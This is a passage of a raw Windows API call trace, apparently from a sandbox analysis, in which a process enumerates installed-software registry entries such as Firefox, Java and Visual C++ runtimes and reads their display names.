lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0047.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mozilla Firefox 25.0 (x86 en-US)", cchWideChar=32, lpMultiByteStr=0x2620ab0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mozilla Firefox 25.0 (x86 en-US)", lpUsedDefaultChar=0x0) returned 32 [0047.598] strlen (_Str="Mozilla Firefox 25.0 (x86 en-US)") returned 0x20 [0047.598] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.598] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xc, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MozillaMaintenanceService", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.598] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="MozillaMaintenanceService", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.598] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x38) returned 0x0 [0047.598] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x261fd60, lpcbData=0x59ffd3c*=0x38 | out: lpType=0x0, lpData=0x261fd60*=0x4d, lpcbData=0x59ffd3c*=0x38) returned 0x0 [0047.598] wcslen (_String="Mozilla Maintenance Service") returned 0x1b [0047.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mozilla Maintenance Service", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0047.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mozilla Maintenance Service", cchWideChar=27, lpMultiByteStr=0x2600650, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mozilla Maintenance Service", lpUsedDefaultChar=0x0) returned 27 [0047.598] strlen (_Str="MozillaMaintenanceService") returned 0x19 [0047.598] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.598] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xd, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.598] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.598] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.598] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.598] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xe, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.598] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.599] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.599] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.599] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xf, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.599] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.599] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.599] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x76 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.599] wcslen (_String="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned 0x3a [0047.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0047.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", cchWideChar=58, lpMultiByteStr=0x261fd60, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpUsedDefaultChar=0x0) returned 58 [0047.599] strlen (_Str="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}") returned 0x26 [0047.599] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.599] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x10, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.599] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.599] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.599] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.599] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x11, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.599] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.599] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.599] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.599] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x12, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.599] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.600] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.600] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x13, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.600] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.600] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.600] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x14, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.600] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.600] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.600] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x15, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.600] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.600] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.600] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x16, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.600] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.600] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.600] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x17, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{26A24AE4-039D-4CA4-87B4-2F83217045FF}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.600] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{26A24AE4-039D-4CA4-87B4-2F83217045FF}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x22) returned 0x0 [0047.600] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2620b40, lpcbData=0x59ffd3c*=0x22 | out: lpType=0x0, lpData=0x2620b40*=0x4a, lpcbData=0x59ffd3c*=0x22) returned 0x0 [0047.601] wcslen (_String="Java 7 Update 45") returned 0x10 [0047.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Java 7 Update 45", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0047.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Java 7 Update 45", cchWideChar=16, lpMultiByteStr=0x2601270, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Java 7 Update 45", lpUsedDefaultChar=0x0) returned 16 [0047.601] strlen (_Str="{26A24AE4-039D-4CA4-87B4-2F83217045FF}") returned 0x26 [0047.601] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.601] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x18, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.601] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.601] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.601] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7a | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.601] wcslen (_String="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030") returned 0x3c [0047.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0047.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", cchWideChar=60, lpMultiByteStr=0x261fc88, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpUsedDefaultChar=0x0) returned 60 [0047.601] strlen (_Str="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 0x26 [0047.601] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.601] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x19, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.601] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.601] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.601] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7a | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.601] wcslen (_String="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned 0x3c [0047.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0047.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", cchWideChar=60, lpMultiByteStr=0x261fcd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpUsedDefaultChar=0x0) returned 60 [0047.601] strlen (_Str="{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 0x26 [0047.601] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.601] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1a, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4A03706F-666A-4037-7777-5F2748764D10}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.602] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{4A03706F-666A-4037-7777-5F2748764D10}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x24) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x262d5d0, lpcbData=0x59ffd3c*=0x24 | out: lpType=0x0, lpData=0x262d5d0*=0x4a, lpcbData=0x59ffd3c*=0x24) returned 0x0 [0047.602] wcslen (_String="Java Auto Updater") returned 0x11 [0047.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Java Auto Updater", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0047.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Java Auto Updater", cchWideChar=17, lpMultiByteStr=0x26011f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Java Auto Updater", lpUsedDefaultChar=0x0) returned 17 [0047.602] strlen (_Str="{4A03706F-666A-4037-7777-5F2748764D10}") returned 0x26 [0047.602] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.602] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1b, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{582EA838-9199-3518-A05C-DB09462F68EC}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.602] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{582EA838-9199-3518-A05C-DB09462F68EC}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x78 | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.602] wcslen (_String="Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25017") returned 0x3b [0047.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25017", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0047.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25017", cchWideChar=59, lpMultiByteStr=0x261fb68, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25017", lpUsedDefaultChar=0x0) returned 59 [0047.602] strlen (_Str="{582EA838-9199-3518-A05C-DB09462F68EC}") returned 0x26 [0047.602] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.602] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1c, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{68306422-7C57-373F-8860-D26CE4BA2A15}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.602] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{68306422-7C57-373F-8860-D26CE4BA2A15}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7e | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.602] wcslen (_String="Microsoft Visual C++ 2017 x86 Additional Runtime - 14.10.25017") returned 0x3e [0047.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x86 Additional Runtime - 14.10.25017", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0047.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x86 Additional Runtime - 14.10.25017", cchWideChar=62, lpMultiByteStr=0x261fd18, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2017 x86 Additional Runtime - 14.10.25017", lpUsedDefaultChar=0x0) returned 62 [0047.603] strlen (_Str="{68306422-7C57-373F-8860-D26CE4BA2A15}") returned 0x26 [0047.603] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.603] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1d, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.603] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.603] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.603] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x54 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.603] wcslen (_String="Microsoft Visual C++ 2005 Redistributable") returned 0x29 [0047.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2005 Redistributable", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0047.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2005 Redistributable", cchWideChar=41, lpMultiByteStr=0x2620c70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2005 Redistributable", lpUsedDefaultChar=0x0) returned 41 [0047.603] strlen (_Str="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}") returned 0x26 [0047.603] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.603] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1e, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, 